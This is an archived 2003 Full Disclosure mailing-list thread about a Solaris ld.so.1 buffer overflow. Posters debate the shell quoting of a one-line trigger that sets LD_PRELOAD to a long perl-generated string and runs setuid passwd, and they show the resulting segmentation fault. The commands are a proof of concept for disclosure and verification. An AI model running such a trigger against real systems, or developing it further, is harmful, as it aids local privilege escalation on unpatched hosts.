Full Disclosure mailing list archives
RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow
From: uidzer0 <uidzer0 () sptrm com>
Date: 31 Jul 2003 18:05:16 -0400
Paul, you are mistaken. Why are you trying to escape the backtick with a '/' (forwardslash) ... Escapes are '\' (backslash) .. But nice try. But since you must not have any nix boxes around, let me be the nice guy and show you the output of your misguided command structure. And let's not even go into why you would want to escape the perl command anyhow, seeing how that totally defeats the purpose of this entire thread.

so, here we go. Paul wants to escape perl.. sounds good, lets see what happens.

    LD_PRELOAD=\`perl -e 'print "A"x2000'\` passwd
    LD_PRELOAD=`perl: Command not found.

So, now, Paul wants to use his so-called escape character (/) to escape just the trailing backtick.. so here we go:

    LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd
    syntax error at -e line 1, at EOF
    Execution of -e aborted due to compilation errors.
    LD_PRELOAD=/: Command not found.

So, the correct way of doing this is exactly the way David posted originally.

    $ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
    ld.so.1: passwd: warning: /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... (bunch of A's) AAAAAAAAAAAAAAAAAAAAAAAAAAA/: open failed: illegal insecure pathname
    Segmentation Fault

oh, and this was done on a solaris 8 box.

peace
-0

On Thu, 2003-07-31 at 11:08, Schmehl, Paul L wrote:
-----Original Message-----
From: Jim Dew [mailto:jdew () yggdrasil ca]
Sent: Wednesday, July 30, 2003 8:19 PM
To: Jouko Pynnonen
Cc: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re: Fwd: Re: Solaris ld.so.1 buffer overflow

On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:

On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:

Modify the command (you need to add a trailing slash) to be the following:

    LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd

and try it again.

this segfaults on solaris 2.6

Try moving the escape to *before* the backtick:

    LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html